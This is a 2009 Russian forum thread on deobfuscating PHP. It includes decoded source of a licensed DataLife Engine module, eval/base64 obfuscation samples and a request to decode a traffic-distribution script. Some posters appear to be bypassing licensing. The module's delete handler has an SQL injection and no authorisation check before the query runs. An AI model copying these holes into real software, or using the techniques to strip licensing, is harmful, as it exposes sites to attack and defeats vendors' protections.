echo base64_decode(strtr($s,'EnteryouwkhRHYKNWOUTAaBbCc DdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrst uvwxyz0123456789+/'));
запускаем скрипт и видем расшифрованный вариант

eLWAux

07.10.2009, 00:09

MafyO_o:@session_start();
@error_reporting(7);
@ini_set('display_errors',true);
@ini_set('html_errors',false);
define('DATALIFEENGINE',true);
define('ROOT_DIR','../..');
define('ENGINE_DIR','..');
include ENGINE_DIR.'/data/config.php';
@include_once ROOT_DIR.'/language/'.$config['langs'].'/referer.lng';
@include (ENGINE_DIR.'/data/referer.perf.php');
@include (ENGINE_DIR.'/data/referer.conf.php');
@include_once ('engine/api/api.class.php');
if ($config['http_home_url'] == "") {
$config['http_home_url'] = explode("engine/ajax/referer.php",$_SERVER['PHP_SELF']);
$config['http_home_url'] = reset($config['http_home_url']);
$config['http_home_url'] = "http://".$_SERVER['HTTP_HOST'].$config['http_home_url'];
}
$lic_tr = false;
$site_key = str_replace("www.","",strtolower($_SERVER['HTTP_HOST']));
$site_key = md5(md5(base64_encode(md5('['.$site_key.'][43434]'))));
if ($site_key == $confms['key']) $lic_tr = true;
if(!$lic_tr) $confms['func_copyright'] = "yes";
function referer_block_end ($referer) {
global $langms,$dle_api,$confms;
if ($confms['func_copyright'] == "yes") {
$copyright .= "<div align=\"right\" style=\"font-size: 9px; padding-right: 3px;\">Copyright © <a href=\"http://getdle.org.ru/\" target=\"_blank\" style=\"text-decoration: none; font-size: 9px;\">GetDLE</a></div>";
}else $copyright = "";
if (!$referer) $referer = $langms['no_seatrans'];
$referer = $referer.$copyright;
$dle_api->save_to_cache ( 'referer_block',$referer );
return $referer;
}
if ($_REQUEST['option']) {
require_once ENGINE_DIR.'/classes/mysql.php';
require_once ENGINE_DIR.'/data/dbconfig.php';
require_once ROOT_DIR.'/language/'.$config['langs'].'/referer.lng';
$config['charset'] = ($lang['charset'] != '') ?$lang['charset'] : $config['charset'];
require_once ENGINE_DIR.'/inc/include/functions.inc.php';
require_once ENGINE_DIR.'/modules/sitelogin.php';
}
if ($_REQUEST['option'] == "activations") {
$domain = strtolower($_SERVER['HTTP_HOST']);
$key = trim($_REQUEST['key']);
if (!@file_get_contents("http://getdle.org.ru/extras/referer/connect.txt"))
{
die("<div style=\"background: lightyellow;border:1px dotted rgb(190,190,190); padding: 5px; color:#FF6666;\" class=\"navigation\">Активация модуля не была произведена, не удалось установить подключение к удаленному серверу. Попробуйте повторить активацию немного позднее.</div>");
}
if (!$key)
{
die("<div style=\"background: lightyellow;border:1px dotted rgb(190,190,190); padding: 5px; color:#FF6666;\" class=\"navigation\">Форма не была заполнена, повторите ввод ключа!</div>");
}else {
$host='www.getdle.org.ru';
$path='/extras/referer/activate.php';
$query = "domain={$domain}&key={$key}";
if (@file_get_contents("http://".$host.$path."?".$query) == "yes") {
include_once (ENGINE_DIR.'/data/referer.conf.php');
$site_key = str_replace("www.","",strtolower($_SERVER['HTTP_HOST']));
$site_key = md5(md5(base64_encode(md5('['.$site_key.'][43434]'))));
$confms['key'] = $site_key;
$handler = fopen(ENGINE_DIR.'/data/referer.conf.php',"w");
fwrite($handler,"<?PHP\r\n\$confms = array (\r\n");
foreach($confms as $name =>$value)
{
$value=addslashes($value);
fwrite($handler,"'{$name}' => \"{$value}\",\r\n");
}
fwrite($handler,");\r\n?>");
fclose($handler);
die("<div style=\"background: lightyellow;border:1px dotted rgb(190,190,190); padding: 5px; color:#64c245;\" class=\"navigation\">Благодарим Вас за покупку нашего модуля. Надеемся что работа с ним доставит Вам только удовольствие! Обновите страницу, чтобы приступить к работе!</div>");
}else {
die("<div style=\"background: lightyellow;border:1px dotted rgb(190,190,190); padding: 5px; color:#FF6666;\" class=\"navigation\">Активация DataLife Engine не была произведена, введенные данные не соответствуют необходимым, либо данная копия была уже активирована на другом сервере.</div>");
}
};
}elseif ($_REQUEST['option'] == "checkinfo") {
include ENGINE_DIR.'/data/referer.perf.php';
if (in_array($_REQUEST['site'],$engines)) $_REQUEST['site'] = $engine[$_REQUEST['site']]['0'];
$url = str_replace ('www.','',$_REQUEST['site']);
function getBarCY($_url) {
$_uri = "http://bar-navig.yandex.ru/u?ver=2&url=".
urlencode($_url)."&show=1";
$fd = @fopen($_uri,"r");
if ($fd) {
while ($buffer = fgets($fd,4096)) $haystack.=$buffer;
fclose($fd);
preg_match("/<tcy rang=\"(.*)\" value=\"(.*)\"\/>/isU",
$haystack,$cy);
return (int) $cy[2];
}else return 0;
}
$googlehost='toolbarqueries.google.com';
$googleua='Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5';
function StrToNum($Str,$Check,$Magic) {
$Int32Unit = 4294967296;
$length = strlen($Str);
for ($i = 0;$i <$length;$i++) {
$Check *= $Magic;
if ($Check >= $Int32Unit) {
$Check = ($Check -$Int32Unit * (int) ($Check / $Int32Unit));
$Check = ($Check <-2147483648) ?($Check +$Int32Unit) : $Check;
}
$Check += ord($Str{$i});
}
return $Check;
}
function HashURL($String) {
$Check1 = StrToNum($String,0x1505,0x21);
$Check2 = StrToNum($String,0,0x1003F);
$Check1 >>= 2;
$Check1 = (($Check1 >>4) &0x3FFFFC0 ) |($Check1 &0x3F);
$Check1 = (($Check1 >>4) &0x3FFC00 ) |($Check1 &0x3FF);
$Check1 = (($Check1 >>4) &0x3C000 ) |($Check1 &0x3FFF);
$T1 = (((($Check1 &0x3C0) <<4) |($Check1 &0x3C)) <<2 ) |($Check2 &0xF0F );
$T2 = (((($Check1 &0xFFFFC000) <<4) |($Check1 &0x3C00)) <<0xA) |($Check2 &0xF0F0000 );
return ($T1 |$T2);
}
function CheckHash($Hashnum) {
$CheckByte = 0;
$Flag = 0;
$HashStr = sprintf('%u',$Hashnum);
$length = strlen($HashStr);
for ($i = $length -1;$i >= 0;$i --) {
$Re = $HashStr{$i};
if (1 === ($Flag %2)) {
$Re += $Re;
$Re = (int)($Re / 10) +($Re %10);
}
$CheckByte += $Re;
$Flag ++;
}
$CheckByte %= 10;
if (0 !== $CheckByte) {
$CheckByte = 10 -$CheckByte;
if (1 === ($Flag %2) ) {
if (1 === ($CheckByte %2)) {
$CheckByte += 9;
}
$CheckByte >>= 1;
}
}
return '7'.$CheckByte.$HashStr;
}
function getch($url) {return CheckHash(HashURL($url));}
function getpr($url) {
global $googlehost,$googleua;
$ch = getch($url);
$fp = @fsockopen($googlehost,80,$errno,$errstr,30);
if ($fp) {
$out = "GET /search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url HTTP/1.1\r\n";
$out .= "User-Agent: $googleua\r\n";
$out .= "Host: $googlehost\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp,$out);
while (!feof($fp)) {
$data = fgets($fp,128);
$pos = strpos($data,"Rank_");
if($pos === false){}else{
$pr=substr($data,$pos +9);
$pr=trim($pr);
$pr=str_replace("\n",'',$pr);
return $pr;
}
}
fclose($fp);
}
}
if(!getpr($url)) {
$pr = "0";
}else {
$pr = getpr($url);
}
$tic = getBarCY("http://".$url);
function dmoz($url) {
$path ="http://search.dmoz.org/cgi-bin/search?search=".str_replace("www.","",$url);
if(!file_exists($path)) {
$data = strip_tags(@implode("",@file($path)));
if(strpos($data,"No Open Directory Project results found")) {
$results = '<a target="_blank" href="http://search.dmoz.org/cgi-bin/search?search='.str_replace("www.","",$url).'">Не описан</a>';
}else {
$results = '<a target="_blank" href="http://search.dmoz.org/cgi-bin/search?search='.str_replace("www.","",$url).'">Есть</a>';
}
}else {
$results = 'нет данных';
}
return $results;
}
$zurl = preg_replace("/^(http:\/\/)/i","",$url);
$zurl = preg_replace("/\/(.*)$/i","",$zurl);
$parse_ya = @file_get_contents('http://bar-navig.yandex.ru/u?ver=2&show=32&url=http://'.$zurl);
function get_yaca($url){
global $parse_ya,$zurl;
preg_match('/<topic title="(.*)" url="(.*)"\/>/i',$parse_ya,$patterns);
$lnk_cat = $patterns[2];
$res = array();
array_push($res,$patterns[1]);
array_push($res,count($patterns[2]));
if(!empty($res[0])){
return 'Есть - <a href="'.$lnk_cat.'">'.$res[0].'</a>';
}else{
return "<a target=\"_blank\" href=\"http://search.yaca.yandex.ru/yca/cy/ch/{$zurl}/\">Не описан</a>";
}
}
$dmoz = dmoz($url);
$yaca = get_yaca($url);
$info .= "<table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">
<tr>
<td><img alt=\"Это скриншот сайта {$_REQUEST['site']}.\" src=\"http://images.websnapr.com/?url={$_REQUEST['site']}&size=t&nocache=90\" style=\"height:70px; width:90px;\"></td>
<td>
PageRang: <b>{$pr}</b>; Яндекс тИЦ: <b>{$tic}</b>;<br />
Каталог DMOZ: {$dmoz}<br />
Каталог Yandex: {$yaca}<br /><br />
<a href=\"http://{$_REQUEST['site']}\" target=\"_blank\">Перейти на сайт →</a>
</td>
</tr>
</table>";
die($info);
}elseif ($_REQUEST['option'] == "addipignor") {
$site_tog = stristr($confms['ip_ignor'],$_REQUEST['ip']);
if($site_tog) die("Ошибка! IP-адрес {$_REQUEST['ip']} уже был занесен в список игнорируемых IP-адресов.");
if ($confms['ip_ignor']) {
$confms['ip_ignor'] = $confms['ip_ignor'].", ".$_REQUEST['ip'];
}else {
$confms['ip_ignor'] = $_REQUEST['ip'];
}
$handler = fopen(ENGINE_DIR.'/data/referer.conf.php',"w");
fwrite($handler,"<?PHP \r\n\$confms = array (\r\n");
foreach($confms as $name =>$value)
{
$value=trim(stripslashes ($value));
$value=htmlspecialchars ($value,ENT_QUOTES);
fwrite($handler,"'{$name}' => \"{$value}\",\r\n");
}
fwrite($handler,");\r\n?>");
fclose($handler);
die("IP-адрес {$_REQUEST['ip']} занесен в список игнорируемых IP-адресов.");
}elseif ($_REQUEST['option'] == "addignor") {
$site_tog = stristr($confms['site_ignor'],$_REQUEST['site']);
if($site_tog) die("Ошибка! Сайт {$_REQUEST['site']} уже был занесен в список игнорируемых сайтов.");
if ($confms['site_ignor']) {
$confms['site_ignor'] = $confms['site_ignor'].", ".$_REQUEST['site'];
}else {
$confms['site_ignor'] = $_REQUEST['site'];
}
$handler = fopen(ENGINE_DIR.'/data/referer.conf.php',"w");
fwrite($handler,"<?PHP \r\n\$confms = array (\r\n");
foreach($confms as $name =>$value)
{
$value=trim(stripslashes ($value));
$value=htmlspecialchars ($value,ENT_QUOTES);
fwrite($handler,"'{$name}' => \"{$value}\",\r\n");
}
fwrite($handler,");\r\n?>");
fclose($handler);
die("Сайт {$_REQUEST['site']} занесен в список игнорируемых сайтов.");
}elseif ($_REQUEST['option'] == "confirmdelete") {
$db->query ("DELETE FROM ".PREFIX ."_referer WHERE id = '".$_REQUEST['id'] ."'");
if(($member_id['user_group'] != 1)) {die ("error");}
if ($_REQUEST['user_hash'] == ""OR $_REQUEST['user_hash'] != $dle_login_hash) {
die ("error");
}
die("<div class=\"refer-del\" alt=\"".$langms['sea_delete_info']."\">".$langms['sea_delete']."</div>");
}elseif ($_REQUEST['option'] == "checkupd") {
$update = @file_get_contents("http://www.getdle.org.ru/extras/referer/version.txt");
if($update >$langms['version']) $info = $langms['ref_upd_01'];
elseif($update == $langms['version']) $info = $langms['ref_upd_02'];
elseif($update == "") {$update = "--";$info = $langms['ref_upd_03'];}
elseif($update <$langms['version']) $info = $langms['ref_upd_04'];
die("<div style=\"background: lightyellow;border:1px dotted rgb(190,190,190);padding: 5px;margin-top: 7px;margin-right: 10px;\">Последняя версия: ".$update." (".$info.")</div>");
}

MafyO_o

07.10.2009, 22:37

eLWAux спс

mailbrush

07.10.2009, 23:10

Написал небольшой деобфускатор кода Николая Конокова. Он деобфусцирует код, который обфусцирован обфускатором Николая Конокова.

Не буду запутывать вас - если у вас есть непонятный вам код, в котором вначале присутствует строка Copyright 2009 Nikolay Konokhovто можете смело использовать мой декодер (деобфускатор), который находится по адресу:

http://mailbrush.eu/tools/decoder.php

Спасибо eLWAux'y за точный фак по деобфускции этого кода.

d_x

08.10.2009, 00:32

Warning: file_get_contents() [function.file-get-contents]: Filename cannot be empty in /home/....../decoder.php on line 11
не выбираем файл)

mailbrush

08.10.2009, 00:54

не выбираем файл)
Поправил, thx :)

SQLHACK

08.10.2009, 15:31

а че вам мой метод не понравился ?

Dark_cracker

08.10.2009, 23:08

а че вам мой метод не понравился ?сначала твоим методом попробывал , код не работал , он не доконца расшифровал, потом пошёл по ссылке mailbrush , попробывал всё норм ;-)

SQLHACK

08.10.2009, 23:41

это как так не работал ?

Dark_cracker

09.10.2009, 07:15

Возми проверь , он даже по другому расшифровует , может там ручками нужно доделывать результат , я не пробывал .

iron-viper

09.10.2009, 10:44

Собственно, никто не сталкивался с Free Online PHP Obfuscator v1.2 , можно ли его раскодировать?

пример кода

//Obfuscation provided by FOPO - Free Online PHP Obfuscator v1.2: http://www.fopo.com.ar
$l280330b5cf5="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x6 5";@eval($l280330b5cf5(
"JGI3NzkzNTY2NmI3N2JmMDEzMWVlYmFkM2ZiOGVlZGMzPSJceD YyIjskaTAyZjM0MmFhMGViN2NiNWU3YjhiZjJ
mZjZkZjJkZGI9Ilx4NjUiOyR2ZDU2YzVhOGJlOWZlMTJmNzU2Y 2M4NTU3NGUzNjczYT0iXHg2NiI7JHljOTBmODk
wZjRiMzNhOTE4YWE5OWU0Y2Q2YzMxNTZlPSJceDY3IjskeDM2Y 2ZkM2JmZWNkYWY1NDIyNGRkMTM1ZDUwNmExNjQ
9Ilx4NmQiOyRoMzhhMTEwMmIwMjI4YWM3N2E0MjVmOTQ4MTYyZ GZlYj0iXHg2ZiI7JHA3ODg0MTI0OTdmN2IxZDA
wMDY5NmM1N2NjMzI3NDQyPSJceDZmIjskajU5NmMwNzhlNzliM DVhODRjNmZiZWY3ZjMxMzc2YzA9Ilx4NmYiOyR
xY2RlYzRkZDE2Yzk0ZTU1YzA0OTU4NzZjMzUxYzRiYj0iXHg2Z iI7JGw3MTExMWFjZmI2ZDFmY2U3M2QwMGFiOTk
2NDk2Y2RlPSJceDczIjskeWQ3Mzk5MTk4YmQxMjNjOTZhZDBhN WFkMjZiYTEzYzQ9Ilx4NzMiOyR2MTM0MDNhYjU
zZjA4MzQyNzc2NzY0OWI0ZGYxNzUzMT0iXHg3MyI7JHVkMzZhM TcxODZmMjM2MzU4YzI2OTllOTBjYjA0MjcyPSJ
ceDczIjskYjc3OTM1NjY2Yjc3YmYwMTMxZWViYWQzZmI4ZWVkY zMuPSJcMTQxIjskaTAyZjM0MmFhMGViN2NiNWU
3YjhiZjJmZjZkZjJkZGIuPSJcMTYyIjskdmQ1NmM1YThiZTlmZ TEyZjc1NmNjODU1NzRlMzY3M2EuPSJcMTUxIjs
keWM5MGY4OTBmNGIzM2E5MThhYTk5ZTRjZDZjMzE1NmUuPSJcM TcyIjskeDM2Y2ZkM2JmZWNkYWY1NDIyNGRkMTM
1ZDUwNmExNjQuPSJcMTQ0IjskaDM4YTExMDJiMDIyOGFjNzdhN DI1Zjk0ODE2MmRmZWIuPSJcMTQyIjskcDc4ODQ
xMjQ5N2Y3YjFkMDAwNjk2YzU3Y2MzMjc0NDIuPSJcMTQyIjska jU5NmMwNzhlNzliMDVhODRjNmZiZWY3ZjMxMzc
2YzAuPSJcMTQyIjskcWNkZWM0ZGQxNmM5NGU1NWMwNDk1ODc2Y zM1MWM0YmIuPSJcMTQyIjskbDcxMTExYWNmYjZ
kMWZjZTczZDAwYWI5OTY0OTZjZGUuPSJcMTY0IjskeWQ3Mzk5M Tk4YmQxMjNjOTZhZDBhNWFkMjZiYTEzYzQuPSJ
cMTY0IjskdjEzNDAzYWI1M2YwODM0Mjc3Njc2NDliNGRmMTc1M zEuPSJcMTY0IjskdWQzNmExNzE4NmYyMzYzNTh

krypt3r

09.10.2009, 11:57

Да, можно. Деобфускация приводит к коду

@eval (gzinflate (base64_decode (str_rot13 ("тут base64-строка"))));

вернуть к исходному несложно)

iron-viper

09.10.2009, 13:06

Да, можно. Деобфускация приводит к коду

@eval (gzinflate (base64_decode (str_rot13 ("тут base64-строка"))));

вернуть к исходному несложно)

А как сделать Деобфускацию? Каким инструментом или какой функцией?

krypt3r

09.10.2009, 13:24

echo ...

=)

Pashkela

09.10.2009, 13:33

вот именно, выложена часть кода обфусцированного:

<?php
@set_time_limit(0);
@ini_set("display_errors","1");
$l280330b5cf5="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x6 5";
echo $l280330b5cf5('JGI3NzkzNTY2NmI3N2JmMDEzMWVlYmFkM2Z iOGVlZGMzPSJceDYyIjskaTAyZjM0MmFhMGViN2NiNWU3YjhiZ jJmZjZkZjJkZGI9Ilx4NjUiOyR2ZDU2YzVhOGJlOWZlMTJmNzU 2Y2M4NTU3NGUzNjczYT0iXHg2NiI7JHljOTBmODkwZjRiMzNhO TE4YWE5OWU0Y2Q2YzMxNTZlPSJceDY3IjskeDM2Y2ZkM2JmZWN kYWY1NDIyNGRkMTM1ZDUwNmExNjQ9Ilx4NmQiOyRoMzhhMTEwM mIwMjI4YWM3N2E0MjVmOTQ4MTYyZGZlYj0iXHg2ZiI7JHA3ODg 0MTI0OTdmN2IxZDAwMDY5NmM1N2NjMzI3NDQyPSJceDZmIjska jU5NmMwNzhlNzliMDVhODRjNmZiZWY3ZjMxMzc2YzA9Ilx4NmY iOyRxY2RlYzRkZDE2Yzk0ZTU1YzA0OTU4NzZjMzUxYzRiYj0iX Hg2ZiI7JGw3MTExMWFjZmI2ZDFmY2U3M2QwMGFiOTk2NDk2Y2R lPSJceDczIjskeWQ3Mzk5MTk4YmQxMjNjOTZhZDBhNWFkMjZiY TEzYzQ9Ilx4NzMiOyR2MTM0MDNhYjUzZjA4MzQyNzc2NzY0OWI 0ZGYxNzUzMT0iXHg3MyI7JHVkMzZhMTcxODZmMjM2MzU4YzI2O TllOTBjYjA0MjcyPSJceDczIjskYjc3OTM1NjY2Yjc3YmYwMTM xZWViYWQzZmI4ZWVkYzMuPSJcMTQxIjskaTAyZjM0MmFhMGViN 2NiNWU3YjhiZjJmZjZkZjJkZGIuPSJcMTYyIjskdmQ1NmM1YTh iZTlmZTEyZjc1NmNjODU1NzRlMzY3M2EuPSJcMTUxIjskeWM5M GY4OTBmNGIzM2E5MThhYTk5ZTRjZDZjMzE1NmUuPSJcMTcyIjs keDM2Y2ZkM2JmZWNkYWY1NDIyNGRkMTM1ZDUwNmExNjQuPSJcM TQ0IjskaDM4YTExMDJiMDIyOGFjNzdhNDI1Zjk0ODE2MmRmZWI uPSJcMTQyIjskcDc4ODQxMjQ5N2Y3YjFkMDAwNjk2YzU3Y2MzM jc0NDIuPSJcMTQyIjskajU5NmMwNzhlNzliMDVhODRjNmZiZWY 3ZjMxMzc2YzAuPSJcMTQyIjskcWNkZWM0ZGQxNmM5NGU1NWMwN Dk1ODc2YzM1MWM0YmIuPSJcMTQyIjskbDcxMTExYWNmYjZkMWZ jZTczZDAwYWI5OTY0OTZjZGUuPSJcMTY0IjskeWQ3Mzk5MTk4Y mQxMjNjOTZhZDBhNWFkMjZiYTEzYzQuPSJcMTY0IjskdjEzNDA zYWI1M2YwODM0Mjc3Njc2NDliNGRmMTc1MzEuPSJcMTY0Ijskd WQzNmExNzE4NmYyMzYzNTh');
?>

выводит:

$b77935666b77bf0131eebad3fb8eedc3="\x62";$i02f342aa0eb7cb5e7b8bf2ff6df2ddb="\x65";$vd56c5a8be9fe12f756cc85574e3673a="\x66";$yc90f890f4b33a918aa99e4cd6c3156e="\x67";$x36cfd3bfecdaf54224dd135d506a164="\x6d";$h38a1102b0228ac77a425f948162dfeb="\x6f";$p788412497f7b1d000696c57cc327442="\x6f";$j596c078e79b05a84c6fbef7f31376c0="\x6f";$qcdec4dd16c94e55c0495876c351c4bb="\x6f";$l71111acfb6d1fce73d00ab996496cde="\x73";$yd7399198bd123c96ad0a5ad26ba13c4="\x73";$v13403ab53f083427767649b4df17531="\x73";$ud36a17186f236358c2699e90cb04272="\x73";$b77935666b77bf0131eebad3fb8eedc3.="\141";$i02f342aa0eb7cb5e7b8bf2ff6df2ddb.="\162";$vd56c5a8be9fe12f756cc85574e3673a.="\151";$yc90f890f4b33a918aa99e4cd6c3156e.="\172";$x36cfd3bfecdaf54224dd135d506a164.="\144";$h38a1102b0228ac77a425f948162dfeb.="\142";$p788412497f7b1d000696c57cc327442.="\142";$j596c078e79b05a84c6fbef7f31376c0.="\142";$qcdec4dd16c94e55c0495876c351c4bb.="\142";$l71111acfb6d1fce73d00ab996496cde.="\164";$yd7399198bd123c96ad0a5ad26ba13c4.="\164";$v13403ab53f083427767649b4df17531.="\164";$ud36a17186f236358

lol100

10.10.2009, 17:37

ребят помогите раскодировать криптованую тдску в ней кодированы некоторые файлы (не все)
ТДС (http://jacksoft.biz/wp-content/uploads/2009/02/stds-mod.rar)
кодировано этим Obfuscation provided by FOPO - Free Online PHP Obfuscator v1.2: http://www.fopo.com.ar

eLWAux

10.10.2009, 18:42

lol100

10.10.2009, 18:54

#28 - #30 посты в етой теме
неполучается, может кто поможет для кого ето просто

iron-viper

10.10.2009, 22:03

Потер...

eLWAux

12.10.2009, 17:35

PERL Обфускатор: http://uasc.org.ua/2009/10/perl-obf/

net-master

16.10.2009, 01:56

Здравствуйте уважаемые форумчане !
Не думал что прийдется с этим столкнутся, все таки пришлось .

В ожидании помощи от вас есть у меня закодированный скрипт при помощи IonCube там не все файлы штук 14 вообщем вроде как нашел декодер пытался раскадировать в итоге получились такие зарисовки

<?php
if ( !extension_loaded( "ionCube Loader" ) ) { $__oc = strtolower( substr( php_uname( ), 0, 3 ) ); $__ln = "/ioncube/ioncube_loader_".$__oc."_".substr( phpversion( ), 0, 3 ).( $__oc == "win" ? ".dll" : ".so" ); $__oid = $__id = realpath( ini_get( "extension_dir" ) ); $__here = dirname( __FILE__ ); if ( 1 < strlen( $__id ) && $__id[1] == ":" ) { $__id = str_replace( "\\", "/", substr( $__id, 2 ) ); $__here = str_replace( "\\", "/", substr( $__here, 2 ) ); } $__rd = str_repeat( "/..", substr_count( $__id, "/" ) ).$__here."/"; $__i = strlen( $__rd ); while ( $__i-- ) { if ( $__rd[$__i] == "/" ) { $__lp = substr( $__rd, 0, $__i ).$__ln; if ( file_exists( $__oid.$__lp ) ) { $__ln = $__lp; break; } } } @dl( $__ln ); } else { exit( "The file ".__FILE__." is corrupted. Ensure that you use binary mode when transferring files with FTP and disable the 'TAR smart cr/lf feature' if using WinZIP\n" ); } if ( function_exists( "_il_exec" ) ) { return _il_exec( ); } echo "Site error: the file <b>".__FILE__."</b> requires the ionCube PHP Loader ".basename( $__ln )." to be installed by the site administrator."; exit( 199 ); echo "\x13мџ\x14\x00¤эбњ!ЖЦ]lhВU\x06щІ\x02]vV\x19Чљ\x17Ёјy°ґ\x19/п›pa·¶]qАа{ЫЖ\x1A\x16%ФЏ[Ї”kщFлn\r“\x15бS~kJ™7”\x17б¬~©Мл ОеlV±Ћ\x1EЏц¬U]НъP]ѕ,MА\$Д8є’»М*±˜М9Ѕ’\\‰.¦'\x06ѕ‰ ЦїhЌ_„‘’`\x01µ#вWрCп‰[бїЩшF2¤uYЧмаІ:ђ„UfТ}®Kћґ—pYоE1� �T\x05ДE}C@гФМe‰жЩ*#дЇWu*fЌ\x15f‚кJd \x06AемПґ\x17\x08cч]9Ц\x0C.[(oщ2j\x01\x06@Х\x04ѓт^§_з0Gtё)а5•¶ Q\x196ЇОEй\x031v©™¦д!*ґz\rУ?k•ЎJ]Хт3Ц8[gйt\x06gXn2\nэ9,PЪјіMАёL—їОh\x0FY\x1Bg� �\x01>ђхuiЮЗОйу\x06г‹‰YGНў\x14Ю‡ґ`\x0C \x0FJ®ф®І+киїҐђйп(?u\x1FBЋi\x08\x05Э� �§wш:ЏЖ*љoОм\x11xхЯ?ЖV^Д\")Ѕ™K-kШ\x0F–@ТAzB\tt3ЩіO\x15Й>і"; echo "ьыд~UЪ\x03Ч‰\x1C?*ћ`\x00•8\x12M\x07Йц п6|њ\x1BqO_Б\x18¦&мmbо±u°A№\x12’r{„г\x08\x1B\x1DC`Y\x04м cyeё‚»ИЦбџМХњPЦгф\x04q®еЌCо/к/НsEfЩ\$Бџ\x03i†\x1CO=D¶ј\x04\x0F™\x1D{ђ yы\$\x16tЁ{V«\x03¶•ШPГЇЩи\n\x15§н\x05 \x12=MиФ“%b‹\x01чКZ\x1E^aн;FZ%А«\x0B\r \x10Юж\x1Dю[¤фљjЭїЎWѓuџЛ—Ањѕ0Ї\x07Ог9њho†o №\x109©c”\x1FВ©вЖж~]бЄ‰>м20Ђ\x1EЁш`р…—F(VxёZ?˜яЉ\x1EЭHЭЩЪr і+rOё\t1yІ\x16\x0C6ќСб\x12\\ЉZз\nршiб\x 05Т‚rўiЎrШP_ќЧЩa\x1C\x10†©\r@b(o¶\x1 4юЮµд\x1FWЊRЃ¶AnҐ±јїаjЭ\n\x03xЧОTr\ x02УJюIыЕ*Ы¦¦Ђ„iаЬдvi?Bw\x12П\\Ю\x1 3\x15Ўт¤Ш\x086чЉ\x0F*A\x0Fи\x16rяZ77„}z: аФ!~їУЋфЯ˜Ћё\"Ю\x1ER9\x16‰«щЉfДцkj\x12Г|IЅг~"; echo "`шCO’Ў,\r#“\x1C3f>ҐЦ\x0B\$\x08ќ3Т\x1F\x06®AэZ“р*МWПpU-,WN|˜fћЉ\x1D\x0F\x0BЌЎе’«єqуЧћF\x12^\x 06Я§Rѓ_Ў,\n|Ц‘—#a}+шqpиhкЛ\x05Ю\x13% A9§\x06\x1D«,2†™їнUЄ:сЉД,!!oоа4+їб TI—‚Ж>Ћ†Ў±/ћцЌЩ\x13\x0F\x07\x05¦LхWoҐрШpr+кќQZ\x1C ”RG\x1F¬‰iоВt”nQn\x0BЭ/a#kHt(\t!K±\x0CїLѕОY\x16.UР,аП¦ЄљнA‘� �\x17jНЋ»\x13\"a(ЗhЩ¬о®r¬“J{±˜7EАфоM\x07':6Хв*Ћј� �ЬCёЙCпЩx\x19БкжЫ•ёGґEґН‡ЃAЭ~Ѓ ѓtEk'х6EЗ\r\x1F!…\x0EХ\x1D\\Сp\t%ы%\\\x1A' юоk§О.я¬5\x12*Я\x0Cњ\x01®\x0Bл>њ/%цDа§¬чЅqГтшФXеЗс\x05\x14Щ9›\"y~\"c«*k\x16\x03єшўWє)\\З\x0Fў7ЄФрў{,\x12\x 15„µК\"еџYЏ+o\rw›‚8ХеH…W‹\$дЃ•’уiRw\x 05Ђ8Е Оу"; echo "hUБµяO0уВj6…P]AЅ%№3a®щЦ„?‚ъЈСp\x02ЈtЌП\"Дj\x17ыЂКaQ\x19K\x19¤шJ*М7SкРЙ\x19\x05Vr е;‡\x1CєЇҐъ\x19lЩ«Б\x0CAіl\x13\x18{†� �=\x052l\x06¶¶µz5ЕЇ¦luВсЮ\nЌЃБ!lюeOК Ѕ›\x1B…дЫ=9\$г?є/XЫ\t°ЫЪX5\x02шО\x1F\x16…*ЛKЊ*kЅ?¬5э;� �\x06ею?™Рq8DЎьFё\x16*\x11·фЕ\x15ВЄ'^ шѓx…(ѕ–/rьЫM{ћќ1pв \x040Щ.8\x15\\э*ГГ±юE`·ЭзЕc\x1B\x01+k\\ \x1EиvdCVћ\x17ц\x1Cp\\UO ‡]‰т®\\Ґ*5L\x1EtМ •ї\x03ўоcр–Kт“кfБ\x17О>k~Чh®Љ^\x14сЯKnудр9цoџЖѕ„d\x0E–Ьj \x0E\x04\x14ЎТђНgг“QnT\tЅь‰`СC-ћ\x18\rВФ\x12SйTрµз©\x1Aфд}\x18x'\x1DЋA \x16\x1BjьЬ\x02Ѓ^bї˜±°z·”О\x10o»\x05ЖD jG)ДІјн˜xYB“Щh°>Vб°\x07ЖЯЯЕn>3*љX\x1F\x05}‹\x15=eK\x0F_"; echo "µ`ѓ,…ьg\x02‘ш\x03tб'7ќѓіЁЌr2q\x05‰ §Zџ*(\x0Cj}W”8ч‘\\…ъi\x17Jђл4NЪ\x1C?y %ЮзбНяkIяh\x08c/џяZl’Ґ\x1CyI«™\x1E‡ќ7p¬їv*у\r‡eЫ Ґs‚\"\x0BЭ¬уZ\nЮу‚©хgfУЮ\nH_\x0Eµ в›5?¬Iє;·T.Ї\x16\x0C…\x01ГЃ’к“ђЁ j«м#*БЯЮrkF\x19#Э}З†G˜\x0E*ПEйє`їє� �Э\x05Є\x1B¶\x14л*ї\x10Ќ]CЕжѕД™\x0Fф¶H*L&2яµ¤ґ9Љ\x1FЉI\x10-‡фДЂ.\x13JҐЬ\x11”P@m‰}я˜'e-їОM°А\x03ROj\x08Qіч\x04°4Щ{о™”жЖ\\[dmm\x01{tЦШУ\x00*[[‚ўйХ*,Ъ8'|\x17JК=ОљИД:*\"AчyІ\x02\\яґйEЖђцй\rЌЩзј\x13M\x05п!� �ЪйK‘УK\x06RQ”sNrfьЯ\r±\x12”лоАСЁ ънжхhbљU“o\\\x19\x0CїЕЇ\x15!Ћуg\np\x16 Дh_\x00\x0BшЏ@мНї|:o]№ZЮ\x05РкRYnњНЩ¤|l\x1EЯ…ґ‹cУjY"; echo "бђXR‰t¬Њ\x03Т\x11I#З\x19?зМt]&д7'Ї9Ќє{aВ\x04\\ж\x0CнР\$\x11Ђg„ш—\"pЂЂ7:ХґњЫџ’%\x0Bв7T±¶\x13ЋF^*љ\ryй\ x03„tL›\x1E\x0Bw6ГVљ*t¬_‰\x06йIe6Б\"bћъ]\n—Ћ~R+џH‘%—¦?‘MMT‡G\r\x06C\x16Ќ`X\x 0B\x17А^}Лґгђ“Аrz\x02Н.э2\t#*CнћЦЋд 